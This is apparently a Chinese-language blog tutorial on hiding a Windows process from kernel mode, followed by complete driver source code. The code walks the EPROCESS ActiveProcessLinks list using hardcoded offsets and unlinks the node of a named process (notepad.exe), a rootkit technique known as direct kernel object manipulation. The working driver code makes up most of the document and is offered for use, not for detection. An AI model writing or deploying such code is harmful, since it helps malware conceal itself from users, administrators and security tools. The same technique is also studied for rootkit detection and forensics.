進程隱藏之內核實現
1、在內核模式下,系統爲每個進程維護了一個EPROCESS結構體,系統所有的進程是通過EPROCESS結構體中的一個ActiveProcessLinks指向的雙端鏈表連接起來的,通過winDBG內核調試工具就可以發現並獲取其相對於EPROCESS結構體的地址(0x88),這樣我們可以通過遍歷該循環鏈表找到我們的目的進程將其鏈表的節點刪除即可隱藏該進程。(EPROCESS中進程PID相對地址爲ox84,進程名字相對地址爲0x174)。
代碼如下:
/****************************
在內核模式下隱藏進程
sky_2012.12.13
****************************/
#include <NTDDK.h>
#define DWORD ULONG
void DriverUnload(IN PDRIVER_OBJECT Driver_Object);
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
IN PIRP pIrp);
//根據進程Pid找到進程
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg);
ANSI_STRING Process_Name;
NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver_Object,
IN PUNICODE_STRING RegisterPath)
{
PLIST_ENTRY pre_ActiveProcessLink;
int flg = 0;
DWORD preprocess = 0x00000000;
CHAR *string1 = "notepad.exe";
Driver_Object->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;
Driver_Object->MajorFunction[IRP_MJ_CLOSE] = HelloDDKDispatchRoutine;
Driver_Object->DriverUnload = DriverUnload;
//找到我們要保護的進程的前一個的EPROCESS
RtlInitAnsiString(&Process_Name,string1);
preprocess = FindProcessEPROCESS(&Process_Name,&flg);
//根據進程的ActiveProcessLink刪除掉我們的目的進程的ActiveProcessLink的連表節點
if(flg)
{
pre_ActiveProcessLink = (PLIST_ENTRY)(preprocess);
pre_ActiveProcessLink->Flink = pre_ActiveProcessLink->Flink->Flink;
pre_ActiveProcessLink->Flink->Blink = pre_ActiveProcessLink;
KdPrint(("Delete Success!\n"));
}
else
{
KdPrint(("notepad.exe dos'nt exist!\n"));
}
return STATUS_SUCCESS;
}
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg)
{
ANSI_STRING CurName;
PLIST_ENTRY cut_ActiveProcessLink = 0x00000000;
DWORD CUR_EPROCESS = 0x00000000;
DWORD curent_id = 0;//記錄當前id
DWORD start_id =0;
int count = 0;//記錄id總數
CUR_EPROCESS = (DWORD)PsGetCurrentProcess();
curent_id = *((DWORD*)(CUR_EPROCESS + 0x84));
start_id = curent_id;
RtlInitAnsiString(&CurName,(char*)CUR_EPROCESS + 0x174);
cut_ActiveProcessLink = (PLIST_ENTRY)(CUR_EPROCESS + 0x88);
//如果相同
if(!RtlCompareString(PsName, &CurName,FALSE))
{
*flg = 1;
return ((DWORD)(cut_ActiveProcessLink->Blink));
}
//接着遍歷
while(1)
{
count++;
cut_ActiveProcessLink = cut_ActiveProcessLink->Flink;
RtlInitAnsiString(&CurName,(char*)cut_ActiveProcessLink - 0x88 + 0x174);
curent_id = *((DWORD*)((DWORD)cut_ActiveProcessLink - 0x88 + 0x84));
if(!RtlCompareString(PsName,&CurName,FALSE))
{
*flg = 1;
return ((DWORD)(cut_ActiveProcessLink->Blink));
}
else if (count>=1&&(start_id == curent_id))
{
KdPrint(("沒有找到!\n"));
return 0x00000000;
}
}
}
//默認的例程
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
IN PIRP pIrp)
{
NTSTATUS status = STATUS_SUCCESS;
KdPrint(("Enter HelloDDKDispatchRoutine\n"));
// 完成IRP
pIrp->IoStatus.Status = status;
IoCompleteRequest(pIrp, IO_NO_INCREMENT );
KdPrint(("Leave HelloDDKDispatchRoutine\n"));
return status;
}
//設置卸載例程
void DriverUnload(IN PDRIVER_OBJECT Driver_Object)
{
KdPrint(("DriverUnload!\n"));
}